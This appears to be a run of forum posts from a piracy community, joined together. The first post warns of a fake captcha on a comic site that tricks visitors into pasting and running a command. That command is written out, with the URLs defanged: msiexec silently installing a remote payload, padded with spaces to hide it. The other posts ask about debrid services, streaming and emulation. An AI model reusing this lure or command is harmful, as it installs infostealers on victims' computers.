Visited the site to easily read comics, (it's easily googleable, the top level domain is li ...

This is a normally reputable site to read comics (mainly western).

It has had captchas for a long time when you started reading something.

However this time, when I opened "Watchmen, Doomsday Clock" I received a small "I'm not a robot" checkmark, upon pressing it gave a small floating window, requesting me to do the following steps:

1.- Press "Win + R"

2.- Press "Ctrl + V"

3.- Press Enter.

Step 1 would've open the "Run command" box, Step 2 would've pasted something, and Step 3. Would've run whatever I posted.

Of course I didn't proceed, after a minute or so, a page loaded that spoke of a document or something.

The page it loaded after that odd malicious captcha was:

https : //bffr1oai [.] monactinal [.] makeup/post/wJYpFHGkvqAzrglrqqOXJf

Which I'm not going to open.

The command it tried to get me to run was:

msiexec /fv ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ https [:] //memorizable [.] yachts/31u7dkr6dcgdh /q

I'm of course editing both urls, by adding a space and brackets around the dot and colon,

The spaces after msiexec /fv were part of the original clipboard data.

It would not affect the running of the command, but it would obfuscate what you are running since the space in the "Run command" Window is limited.

msiexec for those that don't know is the windows installer...

Edit:

u/Erroredv1 mentions:

I looked Into these before and the times I executed the run command the result was always an infostealer

Troy hunt (the creator of HIBP) received a phishing email of this fake captcha verification

I ran it for him in a controlled environment and the result was an infostealer

I'll edit with any update...

I've been wanting to switch to something with lossless hifi audio, which Spotify doesn't have of course. I tried out Tidal and Deezer but the issue is is that I listen to a lot of foreign music that only Spotify has available.

I could download everything but I have several thousand songs across all of my playlists and likes. Does anyone have a solution to this or will I have to wait until Spotify has lossless audio?

I recently found a torrent for a show from a franchise that had several different shows, but it wasnt just that specific show, it also had almost every single show to come out within that franchise (excluding shows that hadn't concluded or hadn't come out at the time of it's release)

I love when this happens

EDIT: the anime only came with the english dub, yea I prefer dubs but I also prefer options, yea this anime DID have an infamously edited english dub, but I like having options

Got upgraded internet so I could possibly stream 4k stuff given that the servers run well. If I gotta torrent it is what it is but I just prefer being able to stream.

I finally upgraded to a modern gaming pc after being behind for years. I've always gamed on a budget, hence the pirating.

I just want to be sure that I won't harm my new pc. Especially since it will be my PC until it'd no longer modern. Lol

I am watching The Shannara Chronicles. The issue i run into in that on e1, the captions were not synced correctly. I was getting spoilers. On episode 2, i had to go through several options to find the right one, but on a different server. And now on episode 3, its just like the first episode.

So that means each episode, i have to spend several minutes to find the right server to get the right captions.

Is there any site where I dont have to worry about this? Im using Safari

EDIT: wow it's real, Stremio/Torrentio/RD is back (kinda).

Due to recent changes to RD API where the endpoint to check for cached info hashes was removed, there was a temporary loss of results due to this endpoint being removed. Integration was adapted to the changes, but this now basically means that Torrentio is not able to know which entries are available for instant streaming, so all links will be marked as [RD download]. That means that for anyone wanting to continue using RD integration it's best to not check the Don't show download to debrid links option.

As a naive approach to still have some indication of what's instantly streamable, Torrentio will maintain it's own short term cache of entries which were added to RD through Torrentio and were fully downloaded. This is in no means up to date with RD and might be incorrect in some cases, as RD clean up the cached files periodically, but it still should be a good enough indicator given that this status is cached temporary (8hrs). This is a temp approach that might be removed if it does not prove legit or adds too much strain on the addon itself. This will not be provided as an external api.

My cousin and I are big fans of the anime Bleach I am willing to watch it in sub, she is not... We decided to check Hulu to see if the new dub episodes have been released, they have not... However the website that I use has the dub episodes already... This is exactly why people turn to piracy in the first place

After the fallout of whatever happening with Real Debrid, im noticing a lot of people are saying its competitors are based in either France (AllDebrid) or EU (Premiumize). My question is why? The EU has some of the strictest laws after US on streaming, it's doesnt make much sense to me to set up shop there.

What prevents them from setting up a server in Russia, India etc? It seems to me that the "plaintiffs" in this case are mainly going to be film and TV companies based in the EU or US. If a debrid service was to base itself in a country like Russia or China surely they would be much more protected against these types of orders? (My logic is that any loss for these predominantly US/EU companies would be a win in Russia/China eyes)

The only software which seems to offer all utilities seems to be magic utilities and it runs on a subscription fucking based model , even a one time purchase is not worth it , let alone paying monthly

tbf the software is pretty dope , shows you real time how many input are there on the mouse , can enable middle mouse button , invert scrolling , shortcuts , change how many fingers need to scroll or press middle mouse button , shows real time discharging ......

& seems to be the only software available for windows

As it looks likely that this service will not be much use anymore what are the alternatives? I am ok for lots of stuff but do use torrents a fair bit and don't want to go down the vpn/torrent client route, RD was ideal for me.

I have two TVs at home: one supports only HDR10+ (Samsung QD-OLED), and the other supports Dolby Vision (LG C4). I’m trying to figure out what to look for when downloading Remux movies/series to ensure the best quality on both.

I’ve read a bit about Dolby Vision layers but still don’t fully understand which releases to prioritize since movies often come in multiple Remux variants.

Additionally, what playback device would you recommend for maximum audio and video quality? I've only got an Apple TV 4k. Appreciate any guidance!

I tried installing the latest version of the Citra emulator, and it seems to work fine, but the CIA file of Puzzle and Dragons Z/Super Mario Bros. Edition I used to test it was considered invalid, even after I tried to decrypt it. I couldn’t convert the CIA file to a 3DS file either, since the converter wouldn’t work.

For those wondering, I do not plan on modding my 3DS itself. Modding my 3DS has a chance (a small one, but still a chance) that I could brick it. I really don’t want to lose my precious 3DS, and I don’t trust myself enough to mod it, so I’d much rather just emulate elsewhere. Can I?
